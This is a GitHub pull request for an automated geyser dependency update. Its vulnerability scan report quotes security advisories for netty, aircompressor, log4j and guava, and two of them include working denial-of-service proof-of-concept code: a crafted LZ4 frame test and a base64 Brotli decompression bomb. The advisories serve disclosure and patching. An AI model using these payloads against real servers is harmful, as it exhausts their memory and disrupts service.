
chore(deps): update geyser to v2.10.0.1144 (#21718)

Merged
github-actions[bot] merged 1 commit into main from renovate/geyser-2.10.x on May 11, 2026

Conversation


@uniget-bot uniget-bot commented May 9, 2026

This PR contains the following updates:

Package  Update  Change
geyser   patch   2.10.0.1138 → 2.10.0.1144

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.


Release Notes

uniget-org/renovate-custom (geyser)

v2.10.0.1144: geyser v2.10.0.1144

Compare Source

Custom release of geyser v2.10.0.1144

v2.10.0.1141: geyser v2.10.0.1141

Compare Source

Custom release of geyser v2.10.0.1141

v2.10.0.1140: geyser v2.10.0.1140

Compare Source

Custom release of geyser v2.10.0.1140


Configuration

📅 Schedule (timezone Europe/Berlin):

  • Branch creation
    • At any time (no schedule defined)
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate.


@nicholasdille-bot nicholasdille-bot left a comment


Auto-approved because label type/renovate is present.

@github-actions

github-actions Bot commented May 9, 2026

🔍 Vulnerabilities of ghcr.io/uniget-org/tools/geyser:2.10.0.1144

📦 Image Reference: ghcr.io/uniget-org/tools/geyser:2.10.0.1144
Digest: sha256:5cbf8787faea292b39a395b90468f7cace59753964b005483e9ad0407e5e4dbd
Vulnerabilities: critical: 0, high: 3, medium: 5, low: 1
Platform: linux/amd64
Size: 42 MB
Packages: 51
critical: 0 high: 1 medium: 1 low: 0 io.netty/netty-codec 4.1.101.Final (maven)

pkg:maven/io.netty/netty-codec@4.1.101.Final

high 7.5: CVE-2026-42583 Uncontrolled Resource Consumption

Affected range: <=4.1.132.Final
Fixed version: 4.1.133.Final
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes (22 bytes in total when compressedLength == 1) to force that allocation.

Details

In io.netty.handler.codec.compression.Lz4FrameDecoder#decode, header fields are trusted for sizing. On the compressed path, once readableBytes >= compressedLength, the decoder calls ctx.alloc().buffer(decompressedLength, decompressedLength) and then decompresses.
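To put a number on this asymmetry, the frame layout can be tallied in plain Java (a standalone sketch, no Netty required; the field sizes are taken from the writes in the PoC):

```java
public class Lz4HeaderMath {
    public static void main(String[] args) {
        // Fields written by the attacker: 8-byte magic number, 1-byte block
        // token, 4-byte compressedLength, 4-byte decompressedLength,
        // 4-byte checksum, then compressedLength payload bytes.
        int header = 8 + 1 + 4 + 4 + 4;       // 21 bytes of header
        int wire = header + 1;                // 22 bytes when compressedLength == 1
        int allocated = 1 << 25;              // 32 MiB allocated before decompression
        System.out.println(wire);             // 22
        System.out.println(allocated / wire); // 1525201, i.e. ~1.5 million-fold
    }
}
```

Each 22-byte message costs the sender almost nothing but pins 32 MiB on the server until the decode fails.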

PoC

The test below demonstrates how an attacker sending 22 bytes forces the server to allocate 32 MB:

    @Test
    void test() throws Exception {
        EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
        try {
            AtomicReference<Throwable> serverError = new AtomicReference<>();
            CountDownLatch latch = new CountDownLatch(1);

            ServerBootstrap server = new ServerBootstrap()
                    .group(workerGroup)
                    .channel(NioServerSocketChannel.class)
                    .childHandler(new ChannelInitializer<SocketChannel>() {
                        @Override
                        protected void initChannel(SocketChannel ch) {
                            ch.pipeline()
                                    .addLast(new Lz4FrameDecoder())
                                    .addLast(new ChannelInboundHandlerAdapter() {
                                        @Override
                                        public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
                                            if (cause instanceof DecoderException) {
                                                serverError.set(cause.getCause());
                                            } else {
                                                serverError.set(cause);
                                            }
                                            latch.countDown();
                                        }
                                    });
                        }
                    });

            ChannelFuture serverChannel = server.bind(0).sync();

            Bootstrap client = new Bootstrap()
                    .group(workerGroup)
                    .channel(NioSocketChannel.class)
                    .handler(new ChannelInboundHandlerAdapter() {
                        @Override
                        public void channelActive(ChannelHandlerContext ctx) {
                            ByteBuf buf = ctx.alloc().buffer(22, 22);
                            buf.writeLong(MAGIC_NUMBER);
                            buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
                            buf.writeIntLE(1);
                            buf.writeIntLE(1 << 25);
                            buf.writeIntLE(0);
                            buf.writeByte(0);

                            ctx.writeAndFlush(buf);

                            ctx.fireChannelActive();
                        }
                    });

            ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();

            assertTrue(latch.await(10, TimeUnit.SECONDS));

            assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());

            clientChannel.channel().close();
            serverChannel.channel().close();
        } finally {
            workerGroup.shutdownGracefully();
        }
    }

Impact

Without per-channel or aggregate memory limits, untrusted senders can exhaust memory with many such small requests.

medium 6.9: CVE-2025-58057 Improper Handling of Highly Compressed Data (Data Amplification)

Affected range: <4.1.125.Final
Fixed version: 4.1.125.Final
CVSS Score: 6.9
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
EPSS Score: 0.062%
EPSS Percentile: 19th
Description

Summary

With specially crafted input, BrotliDecoder and some other decompressing decoders will allocate a large number of reachable byte buffers, which can lead to denial of service.

Details

BrotliDecoder.decompress has no limit on how often it calls pull, decompressing data 64 KB at a time. The buffers are saved in the output list and remain reachable until an OOM is hit. This is essentially a zip bomb.

Tested on 4.1.118, but there were no changes to the decoder since.

PoC

Run this test case with -Xmx1G:

import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;

import java.util.Base64;

public class T {
    public static void main(String[] args) {
        EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
        channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIA
aPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
    }
}

Error:

Exception in thread "main" java.lang.OutOfMemoryError: Cannot reserve 4194304 bytes of direct buffer memory (allocated: 1069580289, limit: 1073741824)
	at java.base/java.nio.Bits.reserveMemory(Bits.java:178)
	at java.base/java.nio.DirectByteBuffer.<init>(DirectByteBuffer.java:121)
	at java.base/java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:332)
	at io.netty.buffer.PoolArena$DirectArena.allocateDirect(PoolArena.java:718)
	at io.netty.buffer.PoolArena$DirectArena.newChunk(PoolArena.java:693)
	at io.netty.buffer.PoolArena.allocateNormal(PoolArena.java:213)
	at io.netty.buffer.PoolArena.tcacheAllocateNormal(PoolArena.java:195)
	at io.netty.buffer.PoolArena.allocate(PoolArena.java:137)
	at io.netty.buffer.PoolArena.allocate(PoolArena.java:127)
	at io.netty.buffer.PooledByteBufAllocator.newDirectBuffer(PooledByteBufAllocator.java:403)
	at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:188)
	at io.netty.buffer.AbstractByteBufAllocator.directBuffer(AbstractByteBufAllocator.java:179)
	at io.netty.buffer.AbstractByteBufAllocator.buffer(AbstractByteBufAllocator.java:116)
	at io.netty.handler.codec.compression.BrotliDecoder.pull(BrotliDecoder.java:70)
	at io.netty.handler.codec.compression.BrotliDecoder.decompress(BrotliDecoder.java:101)
	at io.netty.handler.codec.compression.BrotliDecoder.decode(BrotliDecoder.java:137)
	at io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:530)
	at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:469)
	at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:290)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)
	at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)
	at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)
	at io.netty.channel.embedded.EmbeddedChannel.writeInbound(EmbeddedChannel.java:348)
	at io.netty.handler.codec.compression.T.main(T.java:11)

Impact

DoS for anyone using BrotliDecoder on untrusted input.

critical: 0 high: 1 medium: 0 low: 0 io.netty/netty-transport-native-epoll 4.2.7.Final (maven)

pkg:maven/io.netty/netty-transport-native-epoll@4.2.7.Final

high 7.5: CVE-2026-42577 Missing Release of Resource after Effective Lifetime

Affected range: <4.2.13.Final
Fixed version: 4.2.13.Final
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Description

Summary

Netty's epoll transport fails to detect and close TCP connections that receive a RST after being half-closed, leading to stale channels that are never cleaned up and, in some code paths, a 100% CPU busy-loop in the event loop thread.

Affected versions

All versions of 4.2.x netty-transport-native-epoll up to and including 4.2.12.Final

Fixed in

4.2.13.Final (fix merged into the 4.2 branch via #16689; release not yet cut as of 2026-04-25).

Severity

Medium — Denial of Service (resource exhaustion / CPU spin)

CWE: CWE-772: Missing Release of Resource after Effective Lifetime

Description

When a TCP connection using Netty's epoll transport has ALLOW_HALF_CLOSURE enabled (or is in a half-closed state via the HTTP codec), and the remote peer:

  1. Sends a FIN (half-close), causing the server to mark the input as shutdown, then
  2. Sends a RST (e.g. by closing with SO_LINGER=0)

the server-side channel is never closed. This happens because:

  • epollOutReady() is a no-op when there is no pending flush.
  • epollInReady() short-circuits via shouldBreakEpollInReady() because input is already marked as shutdown.
  • The EPOLLERR/EPOLLHUP error condition is therefore never processed, and channelInactive is never fired.

Depending on the Netty version and configuration, this results in:

  • Stale channels: The connection is never closed or deregistered. An unauthenticated remote attacker can repeat the sequence to accumulate stale connections, exhausting file descriptors, memory, or connection-count limits.
  • CPU busy-loop: In code paths where clearEpollIn0() is not called during the ChannelInputShutdownReadComplete event, epoll_wait returns immediately on every iteration for the affected fd, causing 100% CPU utilization on the event loop thread and starving all other connections multiplexed on it.

Mitigation

  • Upgrade to 4.2.13.Final when released (or build from the 4.2 branch at commit 0ec3d97).
  • If upgrading is not immediately possible, configure idle timeouts on connections to limit the lifetime of stale channels.

critical: 0 high: 1 medium: 0 low: 0 io.airlift/aircompressor 0.27 (maven)

pkg:maven/io.airlift/aircompressor@0.27

high 8.2: CVE-2025-67721 Out-of-bounds Read

Affected range: <2.0.3
Fixed version: 2.0.3
CVSS Score: 8.2
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.065%
EPSS Percentile: 20th
Description

Summary

Incorrect handling of malformed data in Java-based decompressor implementations for Snappy and LZ4 allows remote attackers to read previous buffer contents via crafted compressed input. In applications where the output buffer is reused without being cleared, this may lead to disclosure of sensitive data.

Details

With certain crafted compressed inputs, stale bytes from the output buffer can end up in the uncompressed output. This is relevant for applications that reuse the same output buffer to decompress multiple inputs, for example a web server that allocates a fixed-size buffer for performance reasons. This is similar to GHSA-cmp6-m4wj-q63q.
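The failure mode generalizes beyond aircompressor. The following hypothetical sketch (made-up names, not the library's actual code) shows how a decompressor that trusts a claimed output length can expose stale bytes from a reused buffer:

```java
import java.nio.charset.StandardCharsets;

public class ReusedBufferLeak {
    // Stand-in "decompressor": writes the real payload but returns a
    // claimed length that is larger than what was actually written.
    static int bogusDecompress(byte[] in, byte[] out, int claimedLength) {
        System.arraycopy(in, 0, out, 0, in.length);
        return claimedLength;
    }

    public static void main(String[] args) {
        byte[] out = new byte[16]; // fixed-size buffer reused across requests

        // Request 1: sensitive data fills the buffer.
        byte[] secret = "hunter2-password".getBytes(StandardCharsets.US_ASCII);
        System.arraycopy(secret, 0, out, 0, secret.length);

        // Request 2: malformed input writes 2 bytes but claims 16.
        int n = bogusDecompress("hi".getBytes(StandardCharsets.US_ASCII), out, 16);
        System.out.println(new String(out, 0, n, StandardCharsets.US_ASCII));
        // prints "hinter2-password": 14 bytes of the previous secret leak
    }
}
```

Clearing the buffer (or allocating one per call) before each decompression removes the leak, which is exactly the mitigation the advisory lists.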

Impact

Applications using aircompressor as described above may leak sensitive information to external unauthorized attackers.

Mitigation

The vulnerability is fixed in releases 3.4 and 2.0.3. It can also be mitigated by either:

  • Avoiding reuse of the decompression buffer across calls
  • Clearing the decompression buffer before a call to decompress data
critical: 0 high: 0 medium: 3 low: 0 org.apache.logging.log4j/log4j-core 2.20.0 (maven)

pkg:maven/org.apache.logging.log4j/log4j-core@2.20.0

medium 6.9: CVE-2026-34480 Improper Encoding or Escaping of Output

Affected range: >=2.0-alpha1, <2.25.4
Fixed version: 2.25.4
CVSS Score: 6.9
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score: 0.153%
EPSS Percentile: 36th
Description

Apache Log4j Core's XmlLayout, in versions up to and including 2.25.3, fails to sanitize characters forbidden by the XML 1.0 specification, producing invalid XML output whenever a log message or MDC value contains such characters.

The impact depends on the StAX implementation in use:

  • JRE built-in StAX: Forbidden characters are silently written to the output, producing malformed XML. Conforming parsers must reject such documents with a fatal error, which may cause downstream log-processing systems to drop the affected records.
  • Alternative StAX implementations (e.g., Woodstox, a transitive dependency of the Jackson XML Dataformat module): An exception is thrown during the logging call, and the log event is never delivered to its intended appender, only to Log4j's internal status logger.

Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbidden characters before XML output.
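For reference, the set of characters "forbidden by the XML 1.0 specification" is given by the spec's Char production; a minimal check (a sketch of the rule itself, not Log4j's sanitizer) looks like this:

```java
public class XmlCharCheck {
    // XML 1.0 Char production:
    // #x9 | #xA | #xD | [#x20-#xD7FF] | [#xE000-#xFFFD] | [#x10000-#x10FFFF]
    static boolean isXml10Char(int cp) {
        return cp == 0x9 || cp == 0xA || cp == 0xD
                || (cp >= 0x20 && cp <= 0xD7FF)
                || (cp >= 0xE000 && cp <= 0xFFFD)
                || (cp >= 0x10000 && cp <= 0x10FFFF);
    }

    public static void main(String[] args) {
        System.out.println(isXml10Char(0x1B)); // false: ESC, e.g. from ANSI color codes
        System.out.println(isXml10Char(0x0));  // false: NUL is never legal in XML 1.0
        System.out.println(isXml10Char('A'));  // true
    }
}
```

Any log message or MDC value containing a code point for which this returns false triggers the behavior described above.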

medium 6.3: CVE-2026-34477 Improper Validation of Certificate with Host Mismatch

Affected range: >=2.12.0, <2.25.4
Fixed version: 2.25.4
CVSS Score: 6.3
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score: 0.107%
EPSS Percentile: 28th
Description

The fix for CVE-2025-68161 was incomplete: it addressed hostname verification only when enabled via the log4j2.sslVerifyHostName system property, but not when configured through the verifyHostName attribute of the <Ssl> element.

Although the verifyHostName configuration attribute was introduced in Log4j Core 2.12.0, it was silently ignored in all versions through 2.25.3, leaving TLS connections vulnerable to interception regardless of the configured value.

A network-based attacker may be able to perform a man-in-the-middle attack when all of the following conditions are met:

  • An SMTP, Socket, or Syslog appender is in use.
  • TLS is configured via a nested element.
  • The attacker can present a certificate issued by a CA trusted by the appender's configured trust store, or by the default Java trust store if none is configured.

This issue does not affect users of the HTTP appender, which uses a separate verifyHostname attribute that was not subject to this bug and verifies host names by default.

Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.

medium 6.3: CVE-2025-68161 Improper Validation of Certificate with Host Mismatch

Affected range: >=2.0-beta9, <2.25.3
Fixed version: 2.25.3
CVSS Score: 6.3
CVSS Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:L/SA:N
EPSS Score: 0.026%
EPSS Percentile: 7th
Description

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the verifyHostName configuration attribute or the log4j2.sslVerifyHostName system property is set to true.

This issue may allow a man-in-the-middle attacker to intercept or redirect log traffic under the following conditions:

  • The attacker is able to intercept or redirect network traffic between the client and the log receiver.
  • The attacker can present a server certificate issued by a certification authority trusted by the Socket Appender’s configured trust store (or by the default Java trust store if no custom trust store is configured).

Users are advised to upgrade to Apache Log4j Core version 2.25.3, which addresses this issue.

As an alternative mitigation, the Socket Appender may be configured to use a private or restricted trust root to limit the set of trusted certificates.

critical: 0 high: 0 medium: 1 low: 1 com.google.guava/guava 31.0.1-jre (maven)

pkg:maven/com.google.guava/guava@31.0.1-jre

medium 5.5: CVE-2023-2976 Creation of Temporary File in Directory with Insecure Permissions

Affected range: >=1.0, <32.0.0-android
Fixed version: 32.0.0-android
CVSS Score: 5.5
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
EPSS Score: 0.065%
EPSS Percentile: 20th
Description

Use of Java's default temporary directory for file creation in FileBackedOutputStream in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to access the files created by the class.

Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.

low 3.3: CVE-2020-8908 Improper Handling of Alternate Encoding

Affected range: <32.0.0-android
Fixed version: 32.0.0-android
CVSS Score: 3.3
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
EPSS Score: 0.072%
EPSS Percentile: 22nd
Description

A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava com.google.common.io.Files.createTempDir(). The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.
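One way to follow that recommendation without Guava is java.nio.file.Files.createTempDirectory, which applies owner-only permissions atomically at creation time (a sketch; POSIX file systems only, names are illustrative):

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.attribute.FileAttribute;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;

public class SecureTempDir {
    public static void main(String[] args) throws IOException {
        // rwx------ is set at creation, unlike Guava's Files.createTempDir(),
        // which leaves the directory with the default /tmp-style permissions.
        FileAttribute<Set<PosixFilePermission>> ownerOnly =
                PosixFilePermissions.asFileAttribute(
                        PosixFilePermissions.fromString("rwx------"));
        Path dir = Files.createTempDirectory("app-", ownerOnly);
        try {
            Set<PosixFilePermission> perms = Files.getPosixFilePermissions(dir);
            System.out.println(perms.contains(PosixFilePermission.GROUP_READ)); // false
        } finally {
            Files.delete(dir);
        }
    }
}
```

Because the permissions are part of the create call, there is no window in which other local users can enter the directory.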


@nicholasdille-bot nicholasdille-bot left a comment


Auto-approved because label type/renovate is present.

@uniget-bot uniget-bot changed the title chore(deps): update geyser to v2.10.0.1140 chore(deps): update geyser to v2.10.0.1141 May 10, 2026
@uniget-bot uniget-bot force-pushed the renovate/geyser-2.10.x branch from 16e5d68 to 536a199 Compare May 11, 2026 04:25
@uniget-bot uniget-bot changed the title chore(deps): update geyser to v2.10.0.1141 chore(deps): update geyser to v2.10.0.1144 May 11, 2026

@nicholasdille-bot nicholasdille-bot left a comment


Auto-approved because label type/renovate is present.

@uniget-bot uniget-bot force-pushed the renovate/geyser-2.10.x branch from 536a199 to d19df35 Compare May 11, 2026 08:25
@github-actions

Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/25659381850.

@github-actions
Copy link
Copy Markdown

PR is clean and can be merged. See https://github.com/uniget-org/tools/actions/runs/25659381850.

@github-actions github-actions Bot merged commit 14f7497 into main May 11, 2026
9 checks passed
@github-actions github-actions Bot deleted the renovate/geyser-2.10.x branch May 11, 2026 08:40
3 participants